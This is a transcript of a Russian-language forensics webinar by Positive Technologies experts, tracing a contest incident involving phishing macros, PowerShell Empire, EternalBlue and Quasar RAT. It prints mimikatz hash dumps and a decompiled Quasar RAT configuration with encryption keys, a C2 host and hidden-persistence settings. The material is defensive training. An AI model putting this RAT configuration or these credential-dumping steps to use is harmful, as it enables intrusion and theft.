Расследование инцидентов...c:\documents and...
TRANSCRIPT
![Page 1: Расследование инцидентов...C:\Documents and Settings\ldelconnitore\Application Data\services\spoolsvc.exe 28.03.2019 14:14 C:\Documents and Settings\All Users\Start](https://reader033.vdocuments.net/reader033/viewer/2022052017/602f7d17246d734fde7187e8/html5/thumbnails/1.jpg)
ptsecurity.com
Расследование инцидентов:экспертиза и анализ
Денис Гойденко, Александр Григорян
Эксперты Positive Technologies Expert Security Center
![Page 2: Расследование инцидентов...C:\Documents and Settings\ldelconnitore\Application Data\services\spoolsvc.exe 28.03.2019 14:14 C:\Documents and Settings\All Users\Start](https://reader033.vdocuments.net/reader033/viewer/2022052017/602f7d17246d734fde7187e8/html5/thumbnails/2.jpg)
PT Expert
Security Center
Threat
Intelligence
50+отслеживаемых групп
Incident
Response
50+расследований в год
Network
Security
5000+сетевых сигнатур
Экспертиза в продукты
![Page 3: Расследование инцидентов...C:\Documents and Settings\ldelconnitore\Application Data\services\spoolsvc.exe 28.03.2019 14:14 C:\Documents and Settings\All Users\Start](https://reader033.vdocuments.net/reader033/viewer/2022052017/602f7d17246d734fde7187e8/html5/thumbnails/3.jpg)
План вебинараЧто такое форензика
Обобщение процесса
ТЕОРИЯ Когда применять
Где искать
О конкурсе
С чего начинать анализ
Артефакты
ПРАКТИКА Утилиты
Анализ неформализуемых данных
Реверс
Нормализация данных
ИТОГИ Выявление ключевых событий
Определение индикаторов
![Page 4: Расследование инцидентов...C:\Documents and Settings\ldelconnitore\Application Data\services\spoolsvc.exe 28.03.2019 14:14 C:\Documents and Settings\All Users\Start](https://reader033.vdocuments.net/reader033/viewer/2022052017/602f7d17246d734fde7187e8/html5/thumbnails/4.jpg)
ТЕОРИЯ
![Page 5: Расследование инцидентов...C:\Documents and Settings\ldelconnitore\Application Data\services\spoolsvc.exe 28.03.2019 14:14 C:\Documents and Settings\All Users\Start](https://reader033.vdocuments.net/reader033/viewer/2022052017/602f7d17246d734fde7187e8/html5/thumbnails/5.jpg)
Что такое форензика
Forensics =судебная наука
FORENSIC Science = наука об исследовании доказательств
+
computer = COMPUTER FORENSICS
СБОР ЭКСПЕРТИЗА АНАЛИЗ ОТЧЕТ
Источник Данные Информация Доказательства
nvlpubs.nist.gov/nistpubs/Legacy/SP/nistspecialpublication800-86.pdfGuide to Integrating Forensic Techniques into Incident Response:
![Page 6: Расследование инцидентов...C:\Documents and Settings\ldelconnitore\Application Data\services\spoolsvc.exe 28.03.2019 14:14 C:\Documents and Settings\All Users\Start](https://reader033.vdocuments.net/reader033/viewer/2022052017/602f7d17246d734fde7187e8/html5/thumbnails/6.jpg)
В виде схемы
Raw-артефактыАртефакты
после парсинга
Артефакты после
фильтрации и нормализации
Индикатор компрометации
![Page 7: Расследование инцидентов...C:\Documents and Settings\ldelconnitore\Application Data\services\spoolsvc.exe 28.03.2019 14:14 C:\Documents and Settings\All Users\Start](https://reader033.vdocuments.net/reader033/viewer/2022052017/602f7d17246d734fde7187e8/html5/thumbnails/7.jpg)
Когда применять
• Для реагирования на инциденты ИБ,
• Расследования инцидентов ИБ,
• Выявления причин технических инцидентов,
• Мониторинга,
• Восстановления данных,
• Сбора данных,
• Соответствия требованиям регуляторов
![Page 8: Расследование инцидентов...C:\Documents and Settings\ldelconnitore\Application Data\services\spoolsvc.exe 28.03.2019 14:14 C:\Documents and Settings\All Users\Start](https://reader033.vdocuments.net/reader033/viewer/2022052017/602f7d17246d734fde7187e8/html5/thumbnails/8.jpg)
Где искать
ОПЕРАТИВНАЯ ПАМЯТЬ ПОСТОЯННАЯ ПАМЯТЬ СЕТЕВОЙ ТРАФИК
OS Windows OS *nix Mac OS iOS Android Specialized
A A A A A A A A A A A A A
OPERATING SYSTEMS
APPLICATIONS
![Page 9: Расследование инцидентов...C:\Documents and Settings\ldelconnitore\Application Data\services\spoolsvc.exe 28.03.2019 14:14 C:\Documents and Settings\All Users\Start](https://reader033.vdocuments.net/reader033/viewer/2022052017/602f7d17246d734fde7187e8/html5/thumbnails/9.jpg)
Постоянная память
• SPI Flash
• HDD
• USB Flash/HDD
• Flash cards (MMC/SD/xD etc.)
• CD/DVD
• Backup tape
10110101101001
010111010101100
101100110111101
01010110101011
………………….
file1.exe
file2.evtx
file3.pf
file4.dll
file1.fil
fragmented.file
…………
User Activity
Program Execution
Lateral Movement
Exploitation
…………
![Page 10: Расследование инцидентов...C:\Documents and Settings\ldelconnitore\Application Data\services\spoolsvc.exe 28.03.2019 14:14 C:\Documents and Settings\All Users\Start](https://reader033.vdocuments.net/reader033/viewer/2022052017/602f7d17246d734fde7187e8/html5/thumbnails/10.jpg)
Оперативная память
10110101101001
010111010101100
101100110111101
01010110101011
………………….
Page Tables
Page Directories
……………
_FILE_OBJECT
_EPROCESS
_OBJECT_SYMBOLIC_LINK
_TOKEN
_ETHREAD
……………
![Page 11: Расследование инцидентов...C:\Documents and Settings\ldelconnitore\Application Data\services\spoolsvc.exe 28.03.2019 14:14 C:\Documents and Settings\All Users\Start](https://reader033.vdocuments.net/reader033/viewer/2022052017/602f7d17246d734fde7187e8/html5/thumbnails/11.jpg)
Сетевой трафик
10110101101001
010111010101100
101100110111101
01010110101011
………………….
Packet
Packet
Packet
Packet
Packet
……………
Sublayer field data
Sublayer field data
Sublayer field data
Sublayer field data
……………
![Page 12: Расследование инцидентов...C:\Documents and Settings\ldelconnitore\Application Data\services\spoolsvc.exe 28.03.2019 14:14 C:\Documents and Settings\All Users\Start](https://reader033.vdocuments.net/reader033/viewer/2022052017/602f7d17246d734fde7187e8/html5/thumbnails/12.jpg)
Как собирать
Люди
Администраторы
систем
Пользователи Менеджеры
Технические средства
Online/Offline Virtual Images RAM Dump
Информация о средствах защиты
информацииЛогическая карта сети
Физическая карта сети
Информация о пользователях
Информация о технической реализации процессов
Информация о ключевых событиях
в организации
Информацияо политиках
безопасностиИнформация
о бизнес-процессах
![Page 13: Расследование инцидентов...C:\Documents and Settings\ldelconnitore\Application Data\services\spoolsvc.exe 28.03.2019 14:14 C:\Documents and Settings\All Users\Start](https://reader033.vdocuments.net/reader033/viewer/2022052017/602f7d17246d734fde7187e8/html5/thumbnails/13.jpg)
Как собирать:
технические средства
• Raw access to
locked files
• Native
tools(cmd/PS/bash)
• FastIR
• Onsite parsing/Only
collect
• Mozilla MIG
• GRR
• Velociraptor
• *.vmem
• *.vmsn/*.vmss
• Vbox:
vboxmanage, --
dbg, vboxdump.py
• QEMU – virsh
• Xen/KVM – libvmi
• Hyper-V – vm2dmp
• Not system drive
• F-Response
• Memoryze
• FTK Imager
• EnCase
• Belkasoft RAM Capturer
• Winpmem
• Hardware (1394)
• Физические
блокираторы записи
• Блокираторы записи
на уровне ОС
• Набор переходников
• Live Media
• Набор отверток
• Адаптер для HDD
• Шнур SATA
• TAP
• EWF
Online Offline Virtual machines RAM Dump
![Page 14: Расследование инцидентов...C:\Documents and Settings\ldelconnitore\Application Data\services\spoolsvc.exe 28.03.2019 14:14 C:\Documents and Settings\All Users\Start](https://reader033.vdocuments.net/reader033/viewer/2022052017/602f7d17246d734fde7187e8/html5/thumbnails/14.jpg)
Про конкурс
![Page 15: Расследование инцидентов...C:\Documents and Settings\ldelconnitore\Application Data\services\spoolsvc.exe 28.03.2019 14:14 C:\Documents and Settings\All Users\Start](https://reader033.vdocuments.net/reader033/viewer/2022052017/602f7d17246d734fde7187e8/html5/thumbnails/15.jpg)
Про конкурс
Bot server
File server
Compromised
hosts
Contestant
Data
Brief
Evidences
web.archive.org/web/20190408082359/http://muchmoney.ga/Сайт Much Money:
![Page 16: Расследование инцидентов...C:\Documents and Settings\ldelconnitore\Application Data\services\spoolsvc.exe 28.03.2019 14:14 C:\Documents and Settings\All Users\Start](https://reader033.vdocuments.net/reader033/viewer/2022052017/602f7d17246d734fde7187e8/html5/thumbnails/16.jpg)
Про Much Money
![Page 17: Расследование инцидентов...C:\Documents and Settings\ldelconnitore\Application Data\services\spoolsvc.exe 28.03.2019 14:14 C:\Documents and Settings\All Users\Start](https://reader033.vdocuments.net/reader033/viewer/2022052017/602f7d17246d734fde7187e8/html5/thumbnails/17.jpg)
Про Much Money
![Page 18: Расследование инцидентов...C:\Documents and Settings\ldelconnitore\Application Data\services\spoolsvc.exe 28.03.2019 14:14 C:\Documents and Settings\All Users\Start](https://reader033.vdocuments.net/reader033/viewer/2022052017/602f7d17246d734fde7187e8/html5/thumbnails/18.jpg)
![Page 19: Расследование инцидентов...C:\Documents and Settings\ldelconnitore\Application Data\services\spoolsvc.exe 28.03.2019 14:14 C:\Documents and Settings\All Users\Start](https://reader033.vdocuments.net/reader033/viewer/2022052017/602f7d17246d734fde7187e8/html5/thumbnails/19.jpg)
ПРАКТИКА
![Page 20: Расследование инцидентов...C:\Documents and Settings\ldelconnitore\Application Data\services\spoolsvc.exe 28.03.2019 14:14 C:\Documents and Settings\All Users\Start](https://reader033.vdocuments.net/reader033/viewer/2022052017/602f7d17246d734fde7187e8/html5/thumbnails/20.jpg)
Экспертиза: входные данные
My boss said someone sent letters to our office in Bangladesh with invoices to
pay for someone else’s bill. And the guys from bangladesh sent the money.
Also, the data from our knowledge base and the history of all transactions on
operations are missing. Something strange is also happening with the site, the
administrator cannot enter the administration panel. I need help with forensics.
I took images from hosts and servers. I can give you listings of files from these
images, for which I will give you files that you request. I just need to know the
MD5 file hash and I’ll give you a download link.
• Можешь ли подробнее рассказать об инциденте?
• Чем я тебе могу помочь?
Письма База знанийИстория
транзакцийСайт
• Что случилось-то?
![Page 21: Расследование инцидентов...C:\Documents and Settings\ldelconnitore\Application Data\services\spoolsvc.exe 28.03.2019 14:14 C:\Documents and Settings\All Users\Start](https://reader033.vdocuments.net/reader033/viewer/2022052017/602f7d17246d734fde7187e8/html5/thumbnails/21.jpg)
Экспертиза: письма
![Page 22: Расследование инцидентов...C:\Documents and Settings\ldelconnitore\Application Data\services\spoolsvc.exe 28.03.2019 14:14 C:\Documents and Settings\All Users\Start](https://reader033.vdocuments.net/reader033/viewer/2022052017/602f7d17246d734fde7187e8/html5/thumbnails/22.jpg)
Экспертиза: письма
+ LECmd = открывала, но не получилось:
Fileslist:
1
23
5
6
www.reconstructer.org/OfficeMalScanner:
ericzimmerman.github.io/LECmd:
![Page 23: Расследование инцидентов...C:\Documents and Settings\ldelconnitore\Application Data\services\spoolsvc.exe 28.03.2019 14:14 C:\Documents and Settings\All Users\Start](https://reader033.vdocuments.net/reader033/viewer/2022052017/602f7d17246d734fde7187e8/html5/thumbnails/23.jpg)
Экспертиза: static analyze
olevba.py
7z.exe
oledir.py
www.decalage.info/python/oletoolsOletools:
![Page 24: Расследование инцидентов...C:\Documents and Settings\ldelconnitore\Application Data\services\spoolsvc.exe 28.03.2019 14:14 C:\Documents and Settings\All Users\Start](https://reader033.vdocuments.net/reader033/viewer/2022052017/602f7d17246d734fde7187e8/html5/thumbnails/24.jpg)
Экспертиза: static analyze1
2
3
4
5
Unpacked result.docx: app.xml:
![Page 25: Расследование инцидентов...C:\Documents and Settings\ldelconnitore\Application Data\services\spoolsvc.exe 28.03.2019 14:14 C:\Documents and Settings\All Users\Start](https://reader033.vdocuments.net/reader033/viewer/2022052017/602f7d17246d734fde7187e8/html5/thumbnails/25.jpg)
Экспертиза: static analyze
deBase64
1
Свойство <Company>
deBase64
2
3
4
5 Empire identification
![Page 26: Расследование инцидентов...C:\Documents and Settings\ldelconnitore\Application Data\services\spoolsvc.exe 28.03.2019 14:14 C:\Documents and Settings\All Users\Start](https://reader033.vdocuments.net/reader033/viewer/2022052017/602f7d17246d734fde7187e8/html5/thumbnails/26.jpg)
Экспертиза: sandbox1
2
github.com/ptresearch/AttackDetection/blob/master/PowerShell%20Empire/power_shell_empire.rulesSuricata PT Open Ruleset:
![Page 27: Расследование инцидентов...C:\Documents and Settings\ldelconnitore\Application Data\services\spoolsvc.exe 28.03.2019 14:14 C:\Documents and Settings\All Users\Start](https://reader033.vdocuments.net/reader033/viewer/2022052017/602f7d17246d734fde7187e8/html5/thumbnails/27.jpg)
Экспертиза: EmpireФункциональность(закрепление):
NTUSER.DAT: Software\Microsoft\Windows\CurrentVersion
NTUSER.DAT: Software\Microsoft\Windows\CurrentVersion\Run
deBase64:
1
2
3
![Page 28: Расследование инцидентов...C:\Documents and Settings\ldelconnitore\Application Data\services\spoolsvc.exe 28.03.2019 14:14 C:\Documents and Settings\All Users\Start](https://reader033.vdocuments.net/reader033/viewer/2022052017/602f7d17246d734fde7187e8/html5/thumbnails/28.jpg)
Экспертиза
…а у администратора - получилось
Разница между листингом и $MFT
открывала, но не получилось:
![Page 29: Расследование инцидентов...C:\Documents and Settings\ldelconnitore\Application Data\services\spoolsvc.exe 28.03.2019 14:14 C:\Documents and Settings\All Users\Start](https://reader033.vdocuments.net/reader033/viewer/2022052017/602f7d17246d734fde7187e8/html5/thumbnails/29.jpg)
ЭкспертизаСмотрим листинг папки temp Вширь
Вглубь
Iработа с индикаторами:
• список хэшей
• список имен
рабочая папка хакера – temp, расширяем поиск:
lateral movement
wce.exe
logging
psexec.exe
ADMIN PC
![Page 30: Расследование инцидентов...C:\Documents and Settings\ldelconnitore\Application Data\services\spoolsvc.exe 28.03.2019 14:14 C:\Documents and Settings\All Users\Start](https://reader033.vdocuments.net/reader033/viewer/2022052017/602f7d17246d734fde7187e8/html5/thumbnails/30.jpg)
Экспертиза
Рабочая папка хакера TEMP, изучаем содержимое:
ALL PC
HoboCopy —
TeamViewer —
WCE —
• Фишинг
• Макросы(VBS)
• Архивирование(7z, Rar)
• Удаленное управление cli(Empire, psexec)
• Удаленное управление GUI(TV, AmmyyAdmin, rdp)
• Дамп учетных записей(WCE)
• Скриптинг(PS, cmd)
• Копирование залоченных файлов
+ DC, BOSS hosts
Wce:EmpireProject:
github.com/xymnal/wcegithub.com/EmpireProject/Empirewww.teamviewer.com/github.com/candera/hobocopy
www.ammyy.com/
TeqmViewer:HoboCopy:AmmyyAdmin:
![Page 31: Расследование инцидентов...C:\Documents and Settings\ldelconnitore\Application Data\services\spoolsvc.exe 28.03.2019 14:14 C:\Documents and Settings\All Users\Start](https://reader033.vdocuments.net/reader033/viewer/2022052017/602f7d17246d734fde7187e8/html5/thumbnails/31.jpg)
ЭкспертизаРабочая папка хакера TEMP на ВСЕХ узлах (самый ранний wce):
DC PC
wce.bat wce
![Page 32: Расследование инцидентов...C:\Documents and Settings\ldelconnitore\Application Data\services\spoolsvc.exe 28.03.2019 14:14 C:\Documents and Settings\All Users\Start](https://reader033.vdocuments.net/reader033/viewer/2022052017/602f7d17246d734fde7187e8/html5/thumbnails/32.jpg)
ЭкспертизаРабочая папка хакера TEMP:
DC PC
launcher1.bat BOSS PC
BOSS PC SYSTEM registry hive:
Proxy to 34.238.235.73:80
Some TV, Ammyy, reg-work(secr), static password on TV
![Page 33: Расследование инцидентов...C:\Documents and Settings\ldelconnitore\Application Data\services\spoolsvc.exe 28.03.2019 14:14 C:\Documents and Settings\All Users\Start](https://reader033.vdocuments.net/reader033/viewer/2022052017/602f7d17246d734fde7187e8/html5/thumbnails/33.jpg)
ЭкспертизаИщем все местоположения известных IOCs -> новая папка:
BOSS PC
Видим результат использования WebHistoryPass:
1
2
![Page 34: Расследование инцидентов...C:\Documents and Settings\ldelconnitore\Application Data\services\spoolsvc.exe 28.03.2019 14:14 C:\Documents and Settings\All Users\Start](https://reader033.vdocuments.net/reader033/viewer/2022052017/602f7d17246d734fde7187e8/html5/thumbnails/34.jpg)
ЭкспертизаBOSS PC
PECmd.exe – prefetch timeline
Просмотр документов
Запуск WebHistoryPass
Какие документы открывались?
PECmd: https://ericzimmerman.github.io/
![Page 35: Расследование инцидентов...C:\Documents and Settings\ldelconnitore\Application Data\services\spoolsvc.exe 28.03.2019 14:14 C:\Documents and Settings\All Users\Start](https://reader033.vdocuments.net/reader033/viewer/2022052017/602f7d17246d734fde7187e8/html5/thumbnails/35.jpg)
ЭкспертизаBOSS PC
JLECmd.exe
OSFMount
Пусто
Свободное пространство:
R.saver
JLECmd: ericzimmerman.github.io/
![Page 36: Расследование инцидентов...C:\Documents and Settings\ldelconnitore\Application Data\services\spoolsvc.exe 28.03.2019 14:14 C:\Documents and Settings\All Users\Start](https://reader033.vdocuments.net/reader033/viewer/2022052017/602f7d17246d734fde7187e8/html5/thumbnails/36.jpg)
ЭкспертизаBOSS PC
Тот же CnC
USB attack vector:
![Page 37: Расследование инцидентов...C:\Documents and Settings\ldelconnitore\Application Data\services\spoolsvc.exe 28.03.2019 14:14 C:\Documents and Settings\All Users\Start](https://reader033.vdocuments.net/reader033/viewer/2022052017/602f7d17246d734fde7187e8/html5/thumbnails/37.jpg)
ЭкспертизаBOSS PC
Письма:
Сбор писем:
Bangladesh: Fake:
![Page 38: Расследование инцидентов...C:\Documents and Settings\ldelconnitore\Application Data\services\spoolsvc.exe 28.03.2019 14:14 C:\Documents and Settings\All Users\Start](https://reader033.vdocuments.net/reader033/viewer/2022052017/602f7d17246d734fde7187e8/html5/thumbnails/38.jpg)
Initial Access Execution Persistence Privilege Escalation Defense Evasion Credential Access Discovery Lateral Movement Collection ExfiltrationCommand and
ControlImpact
Spearphishing Attachment
Command-Line Interface
Accessibility Features
Accessibility Features
Obfuscated Files or Information
Account Manipulation
Browser Bookmark Discovery
Remote Desktop Protocol
Data from Local System
Data Compressed Commonly Used PortStored Data
Manipulation
Phishing Through Removable Storage
Graphical User Interface
Registry Run Keys / Startup Folder
Bypass User Account Control
Credential DumpingFile and Directory
DiscoveryRemote File Copy
Data from Network Shared Drive
Data Encrypted Connection Proxy
PowerShell Credentials in FilesNetwork Service
ScanningRemote Services Email Collection
Exfiltration Over Alternative Protocol
Data Encoding
ScriptingNetwork Share
DiscoveryThird-party Software
Exfiltration Over Command and
Control ChannelRemote Access Tools
Third-party Software Network SniffingWindows Admin
SharesRemote File Copy
Trusted Developer Utilities
Query RegistryWindows Remote
ManagementStandard Application
Layer Protocol
Windows Management
Instrumentation
Standard Cryptographic
Protocol
Windows Remote Management
MatrixATT&CK
attack.mitre.org/ATT&CK Matrix for Enterprise:
![Page 39: Расследование инцидентов...C:\Documents and Settings\ldelconnitore\Application Data\services\spoolsvc.exe 28.03.2019 14:14 C:\Documents and Settings\All Users\Start](https://reader033.vdocuments.net/reader033/viewer/2022052017/602f7d17246d734fde7187e8/html5/thumbnails/39.jpg)
CASE 2
![Page 40: Расследование инцидентов...C:\Documents and Settings\ldelconnitore\Application Data\services\spoolsvc.exe 28.03.2019 14:14 C:\Documents and Settings\All Users\Start](https://reader033.vdocuments.net/reader033/viewer/2022052017/602f7d17246d734fde7187e8/html5/thumbnails/40.jpg)
Экспертиза: входные данные
My boss said someone sent letters to our office in Bangladesh with invoices to
pay for someone else’s bill. And the guys from bangladesh sent the money.
Also, the data from our knowledge base and the history of all transactions on
operations are missing. Something strange is also happening with the site, the
administrator cannot enter the administration panel. I need help with forensics.
I took images from hosts and servers. I can give you listings of files from these
images, for which I will give you files that you request. I just need to know the
MD5 file hash and I’ll give you a download link.
• Можешь ли подробнее рассказать об инциденте?
• Чем я тебе могу помочь?
Письма База знанийИстория
транзакцийСайт
• Что случилось-то?
![Page 41: Расследование инцидентов...C:\Documents and Settings\ldelconnitore\Application Data\services\spoolsvc.exe 28.03.2019 14:14 C:\Documents and Settings\All Users\Start](https://reader033.vdocuments.net/reader033/viewer/2022052017/602f7d17246d734fde7187e8/html5/thumbnails/41.jpg)
On the server WIN2003 there used to be a system for processing trade transactions, on which the transaction history was kept. They represent a folder with documents in recent years. The entire transaction archive is missing. We need them for further research.
This is old transaction server. We lost all transactions from it.
![Page 42: Расследование инцидентов...C:\Documents and Settings\ldelconnitore\Application Data\services\spoolsvc.exe 28.03.2019 14:14 C:\Documents and Settings\All Users\Start](https://reader033.vdocuments.net/reader033/viewer/2022052017/602f7d17246d734fde7187e8/html5/thumbnails/42.jpg)
![Page 43: Расследование инцидентов...C:\Documents and Settings\ldelconnitore\Application Data\services\spoolsvc.exe 28.03.2019 14:14 C:\Documents and Settings\All Users\Start](https://reader033.vdocuments.net/reader033/viewer/2022052017/602f7d17246d734fde7187e8/html5/thumbnails/43.jpg)
khalil-shreateh.com/khalil.shtml/it-highlights/8966-Microsoft-Windows-EternalBlue-SMB-Remote-Code-Execution--.html
14809,5,True,5,5,.,pwned.txt,.txt,0,1,,False,F
alse,False,False,False,False,Archive,DosWin
dows,28.03.2019 08:51:33,,28.03.2019
14:14:03,28.03.2019 08:51:33,28.03.2019
14:14:03,28.03.2019 08:51:33,28.03.2019
14:14:03,28.03.2019
08:51:33,0,387888150,466,,,
github.com/EricZimmerman/MFT
www.sans.org/security-resources/posters/windows-forensic-analysis/170/downloadWindows Forensic Analysis:
MFT parser:
Exploit EternalBlue:
![Page 44: Расследование инцидентов...C:\Documents and Settings\ldelconnitore\Application Data\services\spoolsvc.exe 28.03.2019 14:14 C:\Documents and Settings\All Users\Start](https://reader033.vdocuments.net/reader033/viewer/2022052017/602f7d17246d734fde7187e8/html5/thumbnails/44.jpg)
![Page 45: Расследование инцидентов...C:\Documents and Settings\ldelconnitore\Application Data\services\spoolsvc.exe 28.03.2019 14:14 C:\Documents and Settings\All Users\Start](https://reader033.vdocuments.net/reader033/viewer/2022052017/602f7d17246d734fde7187e8/html5/thumbnails/45.jpg)
Path LastModifiedTimeUTCC:\Documents and Settings\Administrator\Application Data\services\sd.exe 15.04.2019 13:24
C:\Documents and Settings\Administrator\Application Data\services\r.exe 15.04.2019 13:18
C:\Documents and Settings\Administrator\Application Data\services\7.exe 15.04.2019 12:28
C:\Documents and Settings\Administrator\Application Data\services\update.exe 15.04.2019 12:18
C:\Documents and Settings\Administrator\Application Data\services\ms.exe 29.03.2019 5:43
C:\Documents and Settings\Administrator\Application Data\services\gs.exe 29.03.2019 5:22
C:\Documents and Settings\Administrator\Application Data\services\kiwi start.bat 29.03.2019 5:03
C:\Documents and Settings\tsokihata\Local Settings\Temp\1\RuXNoMXqqKbW.bat 28.03.2019 20:14
C:\Documents and Settings\tsokihata\Local Settings\Temp\1\RuXNoMXqqKbW.bat 28.03.2019 20:14
C:\Documents and Settings\Administrator\Local Settings\Temp\XmwvDMRXMe3R.bat 28.03.2019 20:14
C:\Documents and Settings\Administrator\Local Settings\Temp\XmwvDMRXMe3R.bat 28.03.2019 20:14
C:\Documents and Settings\ldelconnitore\Application Data\services\spoolsvc.exe 28.03.2019 14:14
C:\Documents and Settings\All Users\Start Menu\Programs\Startup\spoolsvc_x86.exe 28.03.2019 14:14
C:\Documents and Settings\tsokihata\Application Data\services\spoolsvc.exe 28.03.2019 14:14
C:\Documents and Settings\Administrator\Application Data\services\spoolsvc.exe 28.03.2019 14:14
C:\Documents and Settings\tsokihata\Application Data\services\spoolsvc.exe 28.03.2019 14:14
C:\Documents and Settings\All Users\Start Menu\Programs\Startup\spoolsvc_x86.exe 28.03.2019 14:14
C:\Documents and Settings\Administrator\Application Data\services\spoolsvc.exe 28.03.2019 14:14
C:\Documents and Settings\Administrator\Application Data\services\m.exe 28.03.2019 13:25
ericzimmerman.github.io/
Compatibility CacheApplication
AppCompatCacheParser:
![Page 46: Расследование инцидентов...C:\Documents and Settings\ldelconnitore\Application Data\services\spoolsvc.exe 28.03.2019 14:14 C:\Documents and Settings\All Users\Start](https://reader033.vdocuments.net/reader033/viewer/2022052017/602f7d17246d734fde7187e8/html5/thumbnails/46.jpg)
![Page 47: Расследование инцидентов...C:\Documents and Settings\ldelconnitore\Application Data\services\spoolsvc.exe 28.03.2019 14:14 C:\Documents and Settings\All Users\Start](https://reader033.vdocuments.net/reader033/viewer/2022052017/602f7d17246d734fde7187e8/html5/thumbnails/47.jpg)
Microsoft wireless secrets:
No interfaces found
MUCHMONEY\tsokihata::8c528bc80d45f1e2b0d3662b97ebed58:5363dec787f9df3c135e551c92a0ec1d:::
MUCHMONEY\WIN2003$::00000000000000000000000000000000:e16033eeebfe3bed02e7084d72efa727:::
WIN2003\Administrator::c33eb318664f594a8d989d02e7f332d1:f3c6489a9ab82faf5ff959c97d7a4d40:::
MUCHMONEY\WIN2003$::00000000000000000000000000000000:e16033eeebfe3bed02e7084d72efa727:::
Administrator(current):500:c33eb318664f594a8d989d02e7f332d1:f3c6489a9ab82faf5ff959c97d7a4d40:::
ASPNET(current):1003:aad3b435b51404eeaad3b435b51404ee:9344f0479b9974e2add04e93904fd248:::
Guest(current):501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SUPPORT_388945a0(current):1001:aad3b435b51404eeaad3b435b51404ee:1e5697ec0b1a1b89fc429fa23327d8f4:::
![Page 48: Расследование инцидентов...C:\Documents and Settings\ldelconnitore\Application Data\services\spoolsvc.exe 28.03.2019 14:14 C:\Documents and Settings\All Users\Start](https://reader033.vdocuments.net/reader033/viewer/2022052017/602f7d17246d734fde7187e8/html5/thumbnails/48.jpg)
mimikatz # lsadump::sam
Domain : WIN2003
SysKey : 362bc4a7806ee94ebfee8cb009c35ab5
Local SID : S-1-5-21-3089925616-1146513134-864702280
SAMKey : 8dbeb822499a12e3f6b99845677bcd11
RID : 000001f4 (500)
User : Administrator
Hash LM : c33eb318664f594a8d989d02e7f332d1
Hash NTLM: f3c6489a9ab82faf5ff959c97d7a4d40
RID : 000001f5 (501)
User : Guest
RID : 000003e9 (1001)
User : SUPPORT_388945a0
Hash NTLM: 1e5697ec0b1a1b89fc429fa23327d8f4
RID : 000003eb (1003)
User : ASPNET
Hash NTLM: 9344f0479b9974e2add04e93904fd248
lm - 0: 32dc9a9cc3912c522c2a1857bd9eefce
ntlm- 0: 9344f0479b9974e2add04e93904fd248
![Page 49: Расследование инцидентов...C:\Documents and Settings\ldelconnitore\Application Data\services\spoolsvc.exe 28.03.2019 14:14 C:\Documents and Settings\All Users\Start](https://reader033.vdocuments.net/reader033/viewer/2022052017/602f7d17246d734fde7187e8/html5/thumbnails/49.jpg)
www.virustotal.com/gui/file/4ceb14edd4a681997c99255b3b4895c0012a735e5f4ac0323e9c97f102ad5725/detection
app.any.run/tasks/d49fb8b5-3da4-4f65-9706-b5a5e40968ceInteractive Online Malware Analysis Sandbox:
VirusTotal:www.winitor.com/get.htmlMalware Initial Assessment:
![Page 50: Расследование инцидентов...C:\Documents and Settings\ldelconnitore\Application Data\services\spoolsvc.exe 28.03.2019 14:14 C:\Documents and Settings\All Users\Start](https://reader033.vdocuments.net/reader033/viewer/2022052017/602f7d17246d734fde7187e8/html5/thumbnails/50.jpg)
Quasar is a fast and light-weight remote
administration tool coded in C#. The usage
ranges from user support through day-to-day
administrative work to employee monitoring.
Providing high stability and an easy-to-use
user interface, Quasar is the perfect remote
administration solution for you.
github.com/quasar/QuasarRAT
RATQuasar
unit42.paloaltonetworks.com/unit42-downeks-and-quasar-rat-used-in-recent-targeted-attacks-against-governments/
www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf
www.us-cert.gov/ncas/analysis-reports/AR18-352A
Compressed (QuickLZ) & Encrypted (TLS) Task Manager File Manager Remote Desktop Remote Shell Download & Execute Upload & Execute System Information Keylogger (Unicode Support) Reverse Proxy (SOCKS5) Registry Editor
Operation Cloud Hopper:
Analysis Report (AR18-352A):
APT10 – Quasar RAT analysis: www.immersivelabs.com/2019/01/29/apt10-quasar-rat-analysis/
Downeks and Quasar RAT Used in Recent Targeted Attacks Against Governments:
Remote Administration Tool for Windows:
![Page 51: Расследование инцидентов...C:\Documents and Settings\ldelconnitore\Application Data\services\spoolsvc.exe 28.03.2019 14:14 C:\Documents and Settings\All Users\Start](https://reader033.vdocuments.net/reader033/viewer/2022052017/602f7d17246d734fde7187e8/html5/thumbnails/51.jpg)
![Page 52: Расследование инцидентов...C:\Documents and Settings\ldelconnitore\Application Data\services\spoolsvc.exe 28.03.2019 14:14 C:\Documents and Settings\All Users\Start](https://reader033.vdocuments.net/reader033/viewer/2022052017/602f7d17246d734fde7187e8/html5/thumbnails/52.jpg)
AES.SetDefaultKey("RoMfNZtSSIpcpGyRmEXa");
string a =
AES.Decrypt("AatyrR7530jcEddqQ+/COFF8FXAxIWDi3E7SZf5
FbWOk6kqERYpeylucj5ccrULb9ZFIw20J9vcTIbYe3BZwUbi2TE
12nCa9aDyWX3E8Pj8=");
Console.WriteLine(a);
string Version = "1.3.0.0";
string Hosts = "muchm0ney.tk:80;";
int RECONNECTDELAY = 300;
string KEY = "GLfNNklGizWZMlHMlK+j9Q==";
string AUTHKEY = "z6kGPShxpE3GZdg5i2bKweS/wNopLz+fTdJO0JZ6cWWkmrDhJ1vwaKqHuO/FdXrNnoUKbnTlgeODYPpdm5cKEg==";
Environment.SpecialFolder SPECIALFOLDER = Environment.SpecialFolder.ApplicationData;
string DIRECTORY = Environment.GetFolderPath(SPECIALFOLDER);
string SUBDIRECTORY = "services";
string INSTALLNAME = "spoolsvc.exe";
bool HideSubDirectory = true;
bool HideFile = true;
string Mutex = "QSR_MUTEX_muchm0ney";
string RegistryName = "Windows Printer Spool Service";
bool HIDEFILE = true;
bool ENABLELOGGER = true;
string ENCRYPTIONKEY = "RoMfNZtSSIpcpGyRmEXa";
string TAG = "muchm0ney";
string LOGDIRECTORYNAME = "Logs";
bool HIDELOGDIRECTORY= true;
bool HIDEINSTALLSUBDIRECTORY = true;
![Page 53: Расследование инцидентов...C:\Documents and Settings\ldelconnitore\Application Data\services\spoolsvc.exe 28.03.2019 14:14 C:\Documents and Settings\All Users\Start](https://reader033.vdocuments.net/reader033/viewer/2022052017/602f7d17246d734fde7187e8/html5/thumbnails/53.jpg)
AES.SetDefaultKey("RoMfNZtSSIpcpGyRmEXa",
"z6kGPShxpE3GZdg5i2bKweS/wNopLz+fTdJO0JZ6cWWkmrD
